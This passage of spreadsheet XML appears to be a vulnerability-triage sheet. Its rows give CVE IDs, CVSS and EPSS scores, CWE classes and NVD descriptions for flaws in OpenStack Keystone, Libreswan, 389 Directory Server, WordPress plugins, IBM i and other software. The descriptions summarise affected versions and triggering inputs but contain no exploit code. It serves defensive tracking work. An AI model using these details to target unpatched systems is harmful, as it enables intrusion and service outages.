      <c r="D452" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, tokens obtained via OAuth1 access token, application credential, or trust-scoped authentication could create new long-lived credentials or authorize new delegations that persist independently of, and outlive, the credential used to obtain them. The delegation restrictions that block these operations did not consistently apply to all delegated token types, allowing an OAuth1-scoped token, for example, to create application credentials or authorize OAuth1 request tokens despite those operations being restricted for other delegated token types. All Keystone deployments that permit delegated authentication through OAuth1 access tokens, application credentials, or trusts are affected.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80182</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44319</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone 1 and AR.Drone 2 are vulnerable to Denial of Service. The Parrot AR.Drone platform is vulnerable to Wi-Fi deauthentication attack, allowing remote and unauthenticated attackers to disconnect drone from controller during mid-flight.</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44319</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51675</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-691</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. An inaccurate update of program counter (PC) values when SPR changes can lead to a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51675</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52182</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>The Library Corporation LS2 Admin v5.7 to v5.8.0 was discovered to contain an information disclosure vulnerability.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52182</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61478</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-830</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via Spoofed SYN packets.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61478</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61479</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via the SPC Connect Pro software accepts replayed application-layer payloads injected into an active TCP session.</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61479</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61480</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-354, CWE-362, CWE-400</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via spoofed TCP FIN packets without validating the sequence or acknowledgment numbers.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61480</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14296</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>30a5e7fb-040d-440a-8cdf-a4a2068ce72e</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>When using the Direct XIP
update strategy, the main application image starts other cores (i.e. radio
core), based on the currently active slot without additional verification. The
MCUboot in the bare (upstream) configuration assumes that if there is at least
a single slot for each image available, the system is bootable and continues
the boot process. This may lead to a situation when MCUboot picks different
slot for different images (i.e. (a) for the main application and (b) for the
radio image), boots the main application (from slot (a)) that afterwards starts
the radio image by providing an address of the unauthenticated slot ((a)
instead of (b)).</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14296</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14957</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>d42dc95b-23f1-4e06-9076-20753a0fb0df</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-617</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>In FIPS mode, Libreswan's add_decoded_cert() function calls CERT_ExtractPublicKey() and asserts that the result is not NULL. However, CERT_ExtractPublicKey() returns NULL when public key extraction fails, for example if the RSA exponent is set to 0. A remote attacker can send a malformed X.509 certificate in a CERT payload to trigger the assertion, causing the pluto daemon to abort and restart. Continued exploitation causes a denial of service. No remote code execution is possible. Both IKEv1 and IKEv2 are affected. The vulnerability is only exploitable when both the OS and libreswan are running in FIPS mode and at least one CA certificate is loaded. The CERT payload is processed before peer authentication, so no credentials are needed to exploit this. Configurations using only PreSharedKey (PSK) authentication with no CA certificates loaded in the NSS database are not vulnerable.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14957</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R461"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custom-level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S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15667</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R462"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 The etn_manage_event capability is assigned to Contributors by default, meaning any Contributor-level user can set the malicious event_layout value via the REST API without any additional configuration.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15667</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16960</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>The Loops &amp; Logic WordPress plugin before 4.3.0 does not restrict its public template-data action to the data a visitor is permitted to see, allowing unauthenticated users to read arbitrary user records (including email addresses and roles) and arbitrary site options.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16960</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17470</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to a buffer overflow.</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17470</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18058</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>The mobile Smart Connect dashboard UI was subject to manipulation
by 3rd party apps. When paired with a phishing attack, this manipulation could
result in escalated privileges of an attacker within the system.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18058</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18453</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. A missing NULL pointer check in the paged results handling of op_shared_search allows an unauthenticated remote attacker to crash the LDAP server by sending a crafted sequence of search requests using the USE_ONE_BACKEND control, resulting in denial of service.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18453</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22591</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3, Fast DDS’s implementation of SQL‑based content filtering (DDSSQLFilter) allows any participant in a DDS domain to remotely crash other Fast DDS participants by sending a single crafted SEDP `DATA` submessage whose `PID_CONTENT_FILTER_PROPERTY.filterExpression` contains a deeply nested filter expression. Versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3 fix the issue.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22591</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27462</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop returns different responses for valid/invalid usernames depending on multiple factors in the reset password mechanism, leading to user enumeration. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27462</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27490</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
